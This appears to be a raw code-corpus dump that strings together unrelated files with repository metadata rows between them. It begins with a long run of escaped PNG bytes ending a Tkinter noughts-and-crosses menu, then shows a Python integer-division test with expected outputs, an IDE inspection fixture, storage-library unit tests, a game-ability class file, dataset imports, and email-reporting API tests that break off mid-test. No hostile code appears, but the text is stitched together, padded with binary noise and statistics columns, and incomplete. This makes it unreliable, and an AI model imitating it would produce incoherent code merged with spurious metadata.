VR:\xcf+\x04d\xa1{e$\xd4\x0e\xdf\x108\xf6\xd8c\xf7\xbf\xfb\xee\xbbo;\xf4\xd0C\x9d\xacn\xdc`\x85\x87\xb9\xd8\xb9\xee\x9c\x968\xadWs\xb1\xf3s\x08\xffn\xb8\xa5\xb3:w\xee|\x84o:\xbb\x97\x86N\x9b6m\xc9m\xb7\xddv\x05W\xe7\xd9)L6C/\x84{\xad:\x7f\xaf_\xbf~\x8d\xa9S\xa7\xce\x85\x9b\xfet\xbf\xf7[\xed\x17\x01/\x13\x90\xa0{yt\xd46O\x12\x980a\xc2\x0c\x88\xf3\x0e\x8a\xb6\xcd#\xd3\xb5n.w\xbe\xef\x8ef\x8f\x88}\xd6\xc9\'\x9f\xdc\x11\xe7\x14F~\xf7%\x9e\xecX\x1e\x1b\x855\xf7\x9b9G>e\xca\x94\xef\x8d\x03\x8bp\xcf\xa5\xf3w\x8az\xa3F\x8d\xea#\x15\xee;\xd8S}n\x1e\xab\xd1\xe9" \x021\x12\x90\xa0\xc7\x08J\xa7\x89\x80\x9b\x00\x02\xbe^\x83\x8b9\xd3\xb6\x18\xe5g\x14t\n\xb9;\xdd+\xadv\xec`\xb6n\xd8\xb0a\x8f}\xf6\xd9g?\xf0\xbc\xf7\xdf\x7f\x7fb\x90h"\xff|\xfb\xe7\x9f\x7f\xfe\t\n\xb7\xf1p\x07\x02\x1a\x17\xf6\x99\xc2\x8f\xb4\xb2\n\x94\x0b\xd2\r\xa0\xbex\x86\x80\x04\xdd3C\xa1\x86\xf8\x89\x00\xdc\xc8\x8d\x90\xb2\xd5\xf9\xffq\xe7g\xb7\xdf)\xeat\xbd\xf3\x15\xd9S_\x1a2d\x88g\xb2\xd9%\x82\xf35\xd7\\s\x83y(\xa2\xa3\xfa\xc9\x84^\x0b\xbe\xd6\xaaU\xab\xf6\x8a\x15+v%\xa2\r*S\x04\xc2N@\x82\x1e\xf6;@\xfd\xcf\x17\x01\x04y\xd5\xa0@\xb9s\x9c\xb3 Z\xa8\x96t\x85s\xeb\x8ch\xc7\xe6%\x0f"0\xcc39\xda\xf3\xd5\xe1\x18.Bn\x9d\x8f,\x92\x9f\x0f3<lZ\xc2\x1en\xb8C\xdbSO=58\x86\xe2t\x8a\x08\x88\x80\x08\x88@\x90\tx%\xca\x1dk\xc8\x97\xba\x13\xac\xb8#\xdd\x19\xe5n\xc9e\x909-=\xc8\xe3\x91S\xdf\xb0\xd3\x9c\xb3\x07<\x99XR\x1dK:\xc3WF\xff#0\xf0`\xafsQ\x94\xbb\xd7GH\xed\x8b& \x0b]\xf7\x84\x08\xe4\x91\x00\xd6\x9fW\xaf\x81\xc3\x12\xc8\xd0R\xa75N\x97\xb3\x05\x87!p\xee\x9d\x89\x13\'~\x8c\xc43\x9b\xf2X\xbc\xefO\xef\xd4\xa9Ss\x04\xfe-\xe0t\x03\x7f\xcc\x05o{\xc0\xd3\x8b1b\xc4\x88\xf7}\xdfQu@\x04<F@\x82\xee\xb1\x01Qsr%\x90\x95\xeb\x19\t>\x01\xf9\xd7/r\xcf\x17\xf3w\x8a\x16\x84\x9dArY\x19\x19\x19KN=\xf5\xd4\xee\x17\\pA\xb7\x047\xc5\x93\xc5\xa3\xff\x9b[\xb7n\xdd\x10k\xd5k\xdcq\xc7\x1d})\xea\xd1\x89g\xb0\xd5ju\xee\xe2\xe6\xc9\x0e\xa8Q"\xe0S\x02\x12t\x9f\x0e\x9c\x9a\xfd\x0f\x02I\x15\xf9\xb6m\xdb\x1ebs\xc4\xb6D\x0b)Q/\xc3\xefE\xb8,\r\xc6\xbb\xb3\xdb\x18\xac\xd4=\x9b\xa0\x87\xf0X\xb7n]\xe6\xcc\x9933^}\xf5UF\xbf\xef\xc6\xd2\xb6I\xeelz\xe46{\xf6\xec\xe9!D\xa3.\x8b@\xc2\x08h\xf9H\xc2\xd0\xaa\xe0\xa0\x12\xe0\x12\xadn\xdd\xba\x9d\x01\xa1J\xe3\xf6\xa7W_}\xf5\xa5H\x9c\xf2mP\xfb[\x90~a\xc9\xde.\x88wQD\xb7\x979\xe5\x94S\xce\xc2\xf6\xaa\xf3\xb0\xdco+\xcb\xfc\xf2\xcb/\xa7\x16\xa4l]+\x02"\xf0O\x02\x12t\xdd\x11~#\x90Tk<\'8\x9f|\xf2\xc9$Z\xe3~\x03\x97\xca\xf6"\x88p3\xa2\xfd_Ie\x1bT\xb7\x08\x04\x9d\x80\\\xeeA\x1fa\xf5O\x04D@\x04D \x14\x04$\xe8\xa1\x18fuR\x04D@\x04D \xe8\x04$\xe8A\x1fa\xf5O\x04D ^\x04R>\xdd\x13\xaf\x8e\xa8\x9c`\x12\x90\xa0\x07s\\\xd5+\x11\x10\x01\x11\x10\x81\x90\x11\x90\xa0\x87l\xc0\x03\xd0]YI\x01\x18DuA\x04D \xfe\x04$\xe8\xf1g\xaa\x12E@\x04D@\x04D \xe9\x04$\xe8IG\xae\nE@\x04D@\x04D \xfe\x04$\xe8\xf1g\xaa\x12\x13K -\xb1\xc5\xabt\x11\xc8&\xa0\xe9\x1d\xdd\x0c\xbe" A\xf7\xd5p\xa9\xb1{! \x91\xd7\xad\x91\x08\x02\x12\xf4DPU\x99\t# AO\x18Z\x15,\x02" \x02" \x02\xc9# AO\x1ek\xd5\x14\x1f\x02\xbag\xe3\xc3Q\xa5\xe4\x9d\x80<Ayg\xa6+\x92H@_\x8eI\x84\xad\xaa\xe2B\xa0X\x0e\xa5d\xc6\xa5d\x15"\x02\xfb&\xb0[\x80D\xc0\xcb\x04$\xe8^\x1e\x1d\xb5\xed_\x04\x96.]\xba\x1aofq\x0fr\xecv\xc6\xcf\xb3\xbe\xfa\xea\xabO\x84J\x04\xe2M`\xc1\x82\x05sl\xaf{\xbcf}\xfa\xe9\xa7\xef\xc7\xbb\x0e\x95\'\x02" \x02\xa1&p\xd8a\x87\x1d<~\xfc\xf8w\xf0\x85\xbb\xe0\x96[n\xb9\xaeR\xa5J\xda50\xd4wDb:\xdf\xaaU\xab\x06#G\x8e|}\xe1\xc2\x85\xf3\xef\xbf\xff\xfe\x81\x89\xa9E\xa5\x8a\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88\x80\x08\x88@N\x04\xfe\x1f0\x98\xc4b\xda\x84\xb8\x13\x00\x00\x00\x00IEND\xaeB`\x82').subsample(3,3)
menu.geometry('324x400')
menu.title("Noughts and Crosses")
menu.configure(bg='#404040')
label1=Label(master=menu,image=photo,bg='#404040').pack()
label2=Label(master=menu,text='WELCOME!',font=('Helvetica',20),bg='#404040',fg='white').pack(pady=10)
b01=Button(master=menu,width=10,text='START!',font=('Helvetica',10),bg='#363636',fg='white',command=start).pack(pady=5)
b02=Button(master=menu,width=10,text='TUTORIAL',font=('Helvetica',10),bg='#363636',fg='white',command=tutorial).pack(pady=5)
b03=Button(master=menu,width=10,text='LICENSE',font=('Helvetica',10),bg='#363636',fg='white',command=license).pack(pady=5)
b04=Button(master=menu,width=10,text='MORE',font=('Helvetica',10),bg='#363636',fg='white',command=more).pack(pady=5)
menu.mainloop()
menuscreen()
| 605.933702
| 86,176
| 0.724465
| 24,382
| 109,674
| 3.252645
| 0.152982
| 0.017704
| 0.024399
| 0.031322
| 0.229024
| 0.222669
| 0.214801
| 0.212947
| 0.209745
| 0.207651
| 0
| 0.226291
| 0.018865
| 109,674
| 180
| 86,177
| 609.3
| 0.51071
| 0.009993
| 0
| 0.219178
| 0
| 0.589041
| 0.646963
| 0.619829
| 0
| 1
| 0
| 0
| 0
| 1
| 0.068493
| false
| 0.020548
| 0.013699
| 0
| 0.09589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
99f13d954e265de59619f1b4da46bf81e69b06f2
| 386
|
py
|
Python
|
chocopy-rs/test/pa3/div.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 5
|
2020-05-13T03:47:43.000Z
|
2022-01-20T04:52:42.000Z
|
chocopy-rs/test/pa3/div.py
|
wwylele/chocopy-wwylele
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | 4
|
2020-05-18T01:06:15.000Z
|
2020-06-12T19:33:14.000Z
|
chocopy-rs/test/pa3/div.py
|
wwylele/chocopy-rs
|
ef60c94cc9c2d7c8ac11cf2761b724a717ac36aa
|
[
"MIT"
] | null | null | null |
print(21 // 3)
print(21 % 3)
print(21 // -3)
print(21 % -3)
print(-21 // 3)
print(-21 % 3)
print(-21 // -3)
print(-21 % -3)
print(21 // 9)
print(21 % 9)
print(21 // -9)
print(21 % -9)
print(-21 // 9)
print(-21 % 9)
print(-21 // -9)
print(-21 % -9)
print(0 // 3)
print(0 // -3)
print(0 % 3)
print(0 % -3)
#!
#<->#
#7
#0
#-7
#0
#-7
#0
#7
#0
#2
#3
#-3
#-6
#-3
#6
#2
#-3
#0
#0
#0
#0
#<->#
| 8.577778
| 16
| 0.455959
| 80
| 386
| 2.2
| 0.1
| 0.636364
| 0.363636
| 0.590909
| 0.931818
| 0.931818
| 0.886364
| 0.886364
| 0.886364
| 0.755682
| 0
| 0.251656
| 0.217617
| 386
| 44
| 17
| 8.772727
| 0.331126
| 0.085492
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
820a0f0ad6f36167e024f401b5f5d4255ee4ff03
| 237
|
py
|
Python
|
python/testData/inspections/PyUnresolvedReferencesInspection/UsedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyUnresolvedReferencesInspection/UsedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | null | null | null |
python/testData/inspections/PyUnresolvedReferencesInspection/UsedUnresolvedNameImportedSeveralTimes/a.py
|
teddywest32/intellij-community
|
e0268d7a1da1d318b441001448cdd3e8929b2f29
|
[
"Apache-2.0"
] | 1
|
2022-01-02T19:58:08.000Z
|
2022-01-02T19:58:08.000Z
|
<warning descr="Unused import statement">from my_package.my_module import <error descr="Unresolved reference 'eggs'">eggs</error></warning>
from my_package.my_module import <error descr="Unresolved reference 'eggs'">eggs</error>
eggs()
| 47.4
| 139
| 0.78481
| 33
| 237
| 5.515152
| 0.393939
| 0.065934
| 0.142857
| 0.164835
| 0.758242
| 0.758242
| 0.758242
| 0.758242
| 0.758242
| 0.758242
| 0
| 0
| 0.080169
| 237
| 4
| 140
| 59.25
| 0.834862
| 0
| 0
| 0
| 0
| 0
| 0.324895
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.666667
| null | null | 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 9
|
419dc10c5b51a8d2c903e93499bef6f966465f17
| 6,967
|
py
|
Python
|
src/test/python/test_storage/test_var.py
|
ettoreleandrotognoli/py-storage
|
d19a0ccbbb23aed818461775a9fc3cd7c5cc25fa
|
[
"Apache-2.0"
] | null | null | null |
src/test/python/test_storage/test_var.py
|
ettoreleandrotognoli/py-storage
|
d19a0ccbbb23aed818461775a9fc3cd7c5cc25fa
|
[
"Apache-2.0"
] | 4
|
2021-04-13T20:43:11.000Z
|
2021-04-13T22:47:56.000Z
|
src/test/python/test_storage/test_var.py
|
ettoreleandrotognoli/py-storage
|
d19a0ccbbb23aed818461775a9fc3cd7c5cc25fa
|
[
"Apache-2.0"
] | null | null | null |
from unittest import TestCase
from storage.var.jsonpath import JsonPath
from storage.var import Const, Keys, Vars
class TestConst(TestCase):
def test_eq_same_should_be_true(self):
predicate = Const(1) == Const(1)
self.assertTrue(predicate(None))
def test_eq_diff_should_be_false(self):
predicate = Const(1) == Const(2)
self.assertFalse(predicate(None))
def test_ne_same_should_be_false(self):
predicate = Const(1) != Const(1)
self.assertFalse(predicate(None))
def test_ne_diff_should_be_true(self):
predicate = Const(1) != Const(2)
self.assertTrue(predicate(None))
def test_gt_true(self):
predicate = Const(1) > Const(0)
self.assertTrue(predicate(None))
def test_gt_false(self):
predicate = Const(1) > Const(2)
self.assertFalse(predicate(None))
def test_gt_when_equals_should_be_false(self):
predicate = Const(2) > Const(2)
self.assertFalse(predicate(None))
def test_ge_true(self):
predicate = Const(1) >= Const(0)
self.assertTrue(predicate(None))
def test_ge_false(self):
predicate = Const(1) >= Const(2)
self.assertFalse(predicate(None))
def test_ge_when_equals_should_be_true(self):
predicate = Const(2) >= Const(2)
self.assertTrue(predicate(None))
def test_lt_true(self):
predicate = Const(0) < Const(1)
self.assertTrue(predicate(None))
def test_lt_false(self):
predicate = Const(2) < Const(1)
self.assertFalse(predicate(None))
def test_lt_when_equals_should_be_false(self):
predicate = Const(2) < Const(2)
self.assertFalse(predicate(None))
def test_le_true(self):
predicate = Const(0) <= Const(1)
self.assertTrue(predicate(None))
def test_le_false(self):
predicate = Const(2) <= Const(1)
self.assertFalse(predicate(None))
def test_le_when_equals_should_be_true(self):
predicate = Const(2) <= Const(2)
self.assertTrue(predicate(None))
def test_mul(self):
var = Const(2) * Const(3)
value = var(None)
self.assertEqual(value, 6)
def test_mul_3(self):
var = Const(2) * Const(3) * Const(4)
value = var(None)
self.assertEqual(value, 24)
def test_truediv(self):
var = Const(10) / Const(4)
value = var(None)
self.assertEqual(value, 2.5)
def test_truediv_3(self):
var = Const(10) / Const(2) / Const(2)
value = var(None)
self.assertEqual(value, 2.5)
def test_add(self):
var = Const(2) + Const(3)
value = var(None)
self.assertEqual(value, 5)
def test_add_3(self):
var = Const(2) + Const(3) + Const(5)
value = var(None)
self.assertEqual(value, 10)
def test_concat(self):
var = Const('fuu') + Const(' ') + Const('bar')
value = var(None)
self.assertEqual(value, 'fuu bar')
def test_sub(self):
var = Const(2) - Const(3)
value = var(None)
self.assertEqual(value, -1)
def test_sub_3(self):
var = Const(2) - Const(3) - Const(5)
value = var(None)
self.assertEqual(value, -6)
def test_cast_int_to_int(self):
var = Const(1).cast(int)
value = var(None)
self.assertIsInstance(value, int)
def test_cast_str_to_int(self):
var = Const('1').cast(int)
value = var(None)
self.assertIsInstance(value, int)
class TestJsonPath(TestCase):
def test_(self):
data = {
'name': 'Fuu',
'parents': ['Fuu'],
}
predicate = JsonPath.array('$.name') == JsonPath.single('$.parents')
predicate(data)
def test_with_op(self):
data = {
'name': 'Fuu',
'height': 1.8,
'weight': 75.6,
}
imc = JsonPath.single('$.weight') / JsonPath.single('$.height') ** Const(2)
self.assertEqual(imc(data), 75.6 / 1.8 ** 2)
def test_with_op_and_force_var(self):
data = {
'name': 'Fuu',
'height': 1.8,
'weight': 75.6,
}
imc = JsonPath.single('$.weight') / JsonPath.single('$.height') ** 2
self.assertEqual(imc(data), 75.6 / 1.8 ** 2)
class TestKeys(TestCase):
def test_single_key(self):
id_value = 1
get_id = Keys(('id',))
obj = {'id': id_value}
self.assertEqual(get_id(obj), id_value)
def test_double_key(self):
id_value = 1
get_id = Keys(('parent', 'id',))
obj = {'parent': {'id': id_value}}
self.assertEqual(get_id(obj), id_value)
def test_cast_int_to_int(self):
var = Keys().cast(int)
value = var(1)
self.assertIsInstance(value, int)
def test_cast_str_to_int(self):
var = Keys().cast(int)
value = var('1')
self.assertIsInstance(value, int)
def test_cast_twice(self):
var = Keys().cast(int).cast(int)
value = var('1')
self.assertIsInstance(value, int)
class TestOptimize(TestCase):
def test_true_or(self):
var = Vars.const(True) | Vars.key('any')
optimized_var = var.optimize()
self.assertTrue(Const.is_true(optimized_var))
def test_or_true(self):
var = Vars.key('any') | Vars.const(True)
optimized_var = var.optimize()
self.assertTrue(Const.is_true(optimized_var))
def test_and_false(self):
var = Vars.key('any') & Vars.const(False)
optimized_var = var.optimize()
self.assertTrue(Const.is_false(optimized_var))
def test_false_and(self):
var = Vars.const(False) & Vars.key('any')
optimized_var = var.optimize()
self.assertTrue(Const.is_false(optimized_var))
def test_eq_same_key(self):
var = Vars.key('id') == Vars.key('id')
optimized_var = var.optimize()
self.assertTrue(Const.is_true(optimized_var))
def test_eq_same_keys(self):
var = Vars.keys(('parent', 'id',)) == Vars.keys(('parent', 'id',))
optimized_var = var.optimize()
self.assertTrue(Const.is_true(optimized_var))
def test_eq_same_const(self):
var = Vars.const('const') == Vars.const('const')
optimized_var = var.optimize()
self.assertTrue(Const.is_true(optimized_var))
def test_ne_same_key(self):
var = Vars.key('id') != Vars.key('id')
optimized_var = var.optimize()
self.assertTrue(Const.is_false(optimized_var))
def test_ne_same_keys(self):
var = Vars.keys(('parent', 'id',)) != Vars.keys(('parent', 'id',))
optimized_var = var.optimize()
self.assertTrue(Const.is_false(optimized_var))
def test_ne_same_const(self):
var = Vars.const('const') != Vars.const('const')
optimized_var = var.optimize()
self.assertTrue(Const.is_false(optimized_var))
| 29.150628
| 83
| 0.593225
| 904
| 6,967
| 4.384956
| 0.094027
| 0.079465
| 0.072654
| 0.080727
| 0.850908
| 0.833502
| 0.82442
| 0.807265
| 0.719223
| 0.703078
| 0
| 0.019746
| 0.265825
| 6,967
| 238
| 84
| 29.273109
| 0.75523
| 0
| 0
| 0.423913
| 0
| 0
| 0.030286
| 0
| 0
| 0
| 0
| 0
| 0.23913
| 1
| 0.244565
| false
| 0
| 0.016304
| 0
| 0.282609
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
68ceeb6172c4b33eb7f9c9fd9f6f2ad0b9d1f4d9
| 306
|
py
|
Python
|
bflib/characters/specialabilities/immunities.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | 3
|
2017-10-28T11:28:38.000Z
|
2018-09-12T09:47:00.000Z
|
bflib/characters/specialabilities/immunities.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
bflib/characters/specialabilities/immunities.py
|
ChrisLR/BasicDungeonRL
|
b293d40bd9a0d3b7aec41b5e1d58441165997ff1
|
[
"MIT"
] | null | null | null |
from bflib.characters.specialabilities.base import ImmunitySpecialAbility
class CharmImmunity(ImmunitySpecialAbility):
pass
class GhoulParalysisImmunity(ImmunitySpecialAbility):
pass
class HoldImmunity(ImmunitySpecialAbility):
pass
class SleepImmunity(ImmunitySpecialAbility):
pass
| 17
| 73
| 0.820261
| 23
| 306
| 10.913043
| 0.565217
| 0.414343
| 0.370518
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.130719
| 306
| 17
| 74
| 18
| 0.943609
| 0
| 0
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0.444444
| 0.111111
| 0
| 0.555556
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 1
| 0
|
0
| 7
|
6bccdb52ee77152f9aafdc13d7602ccc4405df43
| 275
|
py
|
Python
|
sdcdup/data/__init__.py
|
WillieMaddox/Airbus_SDC_dup
|
09be904cf3c8050086f07538f5e2954282de5d62
|
[
"MIT"
] | null | null | null |
sdcdup/data/__init__.py
|
WillieMaddox/Airbus_SDC_dup
|
09be904cf3c8050086f07538f5e2954282de5d62
|
[
"MIT"
] | null | null | null |
sdcdup/data/__init__.py
|
WillieMaddox/Airbus_SDC_dup
|
09be904cf3c8050086f07538f5e2954282de5d62
|
[
"MIT"
] | null | null | null |
from .dataset_utils import create_256_tiles
from .dataset_utils import create_dataset_from_tiles
from .dataset_utils import create_dataset_from_truth
from .dataset_utils import TrainDataset
from .dataset_utils import EvalDataset
from .dataset_utils import WrappedDataLoader
| 34.375
| 52
| 0.887273
| 38
| 275
| 6.052632
| 0.289474
| 0.286957
| 0.417391
| 0.573913
| 0.504348
| 0.382609
| 0.382609
| 0.382609
| 0
| 0
| 0
| 0.012
| 0.090909
| 275
| 7
| 53
| 39.285714
| 0.908
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
6beada73fda3dc445472c870d5058e601e144152
| 8,516
|
py
|
Python
|
tests/reporting_test.py
|
aluc-nd/EmmaPython
|
7368b42ba7b4f1a3eff9fc8dc626551311b1e8de
|
[
"MIT"
] | 10
|
2015-06-02T13:24:53.000Z
|
2021-07-16T15:03:45.000Z
|
tests/reporting_test.py
|
aluc-nd/EmmaPython
|
7368b42ba7b4f1a3eff9fc8dc626551311b1e8de
|
[
"MIT"
] | 11
|
2015-09-20T01:39:36.000Z
|
2021-04-14T13:06:25.000Z
|
tests/reporting_test.py
|
aluc-nd/EmmaPython
|
7368b42ba7b4f1a3eff9fc8dc626551311b1e8de
|
[
"MIT"
] | 12
|
2015-05-26T23:39:28.000Z
|
2021-03-15T07:42:48.000Z
|
import unittest
from emma.model.account import Account
from emma.enumerations import Report, DeliveryType
from emma import get_report
from tests.model import MockAdapter
class ReportingTest(unittest.TestCase):
def setUp(self):
Account.default_adapter = MockAdapter
self.account = Account(
account_id="100",
public_key="xxx",
private_key="yyy")
def test_can_get_response_summary(self):
MockAdapter.expected = []
report = get_report(self.account, Report.ResponseSummary)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response', {}))
def test_can_get_response_summary2(self):
MockAdapter.expected = []
report = get_report(self.account, Report.ResponseSummary, params={'include_archived': True})
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response', {'include_archived': True}))
def test_can_get_response_summary3(self):
MockAdapter.expected = []
report = get_report(self.account, Report.ResponseSummary, params={'range': "2011-04-01~2011-09-01"})
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response', {'range': "2011-04-01~2011-09-01"}))
def test_can_get_response_summary_for_mailing(self):
MockAdapter.expected = {}
report = get_report(self.account, Report.MailingSummary, 123)
self.assertIsInstance(report, dict)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123', {}))
def test_can_get_sent_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.SentList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/sends', {}))
def test_can_get_in_progress_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.InProgressList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/in_progress', {}))
def test_can_get_deliveries_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.DeliveredList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/deliveries', {}))
def test_can_get_deliveries_list_for_mailing2(self):
MockAdapter.expected = []
report = get_report(self.account, Report.DeliveredList, 123, {'del_status': DeliveryType.Delivered})
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/deliveries', {'del_status': 'd'}))
def test_can_get_opens_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.OpenList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/opens', {}))
def test_can_get_links_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.LinkList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/links', {}))
def test_can_get_clicks_list_for_mailing(self):
MockAdapter.expected = []
report = get_report(self.account, Report.ClickList, 123)
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/clicks', {}))
def test_can_get_clicks_list_for_mailing2(self):
MockAdapter.expected = []
report = get_report(self.account, Report.ClickList, 123, {'member_id': 1024})
self.assertIsInstance(report, list)
self.assertEquals(self.account.adapter.called, 1)
self.assertEquals(
self.account.adapter.call,
('GET', '/response/123/clicks', {'member_id': 1024}))
def test_can_get_clicks_list_for_mailing3(self):
MockAdapter.expected = []
report = get_report(self.account, Report.ClickList, 123, {'link_id': 1024})
self.assertIsInstance(report, list)
